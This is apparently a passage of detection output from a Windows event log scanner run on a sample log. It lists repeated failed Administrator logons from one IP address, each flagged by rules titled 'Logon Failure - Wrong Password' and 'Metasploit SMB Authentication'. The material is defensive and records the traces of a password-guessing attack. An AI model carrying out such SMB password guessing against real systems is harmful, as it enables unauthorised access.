NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.166 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mlIfE0N32OQeWuNw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nkZcjpTmHcJ0uX38 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GZfaHr2Yq6xkRjOI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.301 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jvy0EIiPSnom7pn3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TN9PUb0BgI3u8Xax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xCgz5BNpQgLgW0Xi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.429 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: po2GBdrXr3XtBsWR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.478 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O2rgo6jHcqu10IGY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MLblUOGzYzVA47E9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ysuA1xpYuAGRNONJ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.616 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ksedziaGzXk5VNlS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.711 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: irIfGLQdhtRRGwuo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.711 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YCf6WUjiS11hHqKT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1o0CTT7GsWfCWuHx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F6Jr8XrUsmTiSdol : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Buj66iuSkLEQdKnQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.868 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: L1wOLI51HqfkgO6r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.912 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X4oe273WXOICzkwW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1c7nGezYNJ70jR6R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.992 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ajuZ09zGeuovCQLg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z4k7xV7soNF4mHlz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CtdqW8zOw1GoQcvA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aY6FLi1edRZWrRZN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ah1JoKfxJzQhCCVL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.204 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gIMOZRGcv4o33BWd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nmLyLJoVZz6fJ62I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.276 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: aGufqEGD4hFf2XLM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.308 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7IEdKy2H5Agblpjt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.340 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XT9k8C05GVLBNPdl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.384 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5opHh8HelCXtR5Cm : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K0dntDwYLmag9efo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.473 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.514 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UQfZOMFV9LtY7r2S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.514 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y01v38dTUIsJEZIv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.632 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pCP8x2QBZ6IvMEnf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.684 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.739 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hgcbYjw3kKqlK7Di : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.739 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TFU97Tq3e7IWvSKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 1hUCvaS1yM2FU9AE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.808 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8JInVlBqTSfT4J1s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.852 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EjXRQUGDKBZaMkw3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.896 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fZPXNxkGOrld5eCR : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.937 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OBDhSrF7DZ1KBRa8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:54.978 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dQ7TKJOGibAVNoCH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.013 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.054 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZE1GARxx03m4FtEL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.054 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gf3VLLTxsK85bsrv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.123 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 58G6MFVbW55JZIV5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.123 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yxne9LqZCqBf3qkc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.160 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:55.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
